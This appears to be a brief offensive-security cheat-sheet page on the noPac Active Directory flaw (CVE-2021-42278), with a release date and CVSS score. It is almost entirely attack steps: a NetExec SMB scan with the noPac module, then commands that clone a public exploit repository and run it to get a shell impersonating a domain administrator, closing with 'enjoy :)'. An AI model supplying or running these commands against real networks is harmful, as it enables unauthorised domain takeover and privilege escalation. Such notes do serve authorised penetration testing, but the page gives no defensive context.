noPac - CVE-2021-42278

  • Release Date: Nov 9, 2021

  • Impact: Elevation of Privilege

  • CVSS score: 8.8

Affected products

Brief

Scan | Exploit

# scan
nxc smb $ip -u $user -p $pass -M noPac

# exploit
git clone https://github.com/Ridter/noPac
cd noPac/
ls -al
python3 noPac.py $domain/$username:$password -dc-ip $ip -shell --impersonate $administrator_name -use-ldap
# enjoy :)

Last updated

Was this helpful?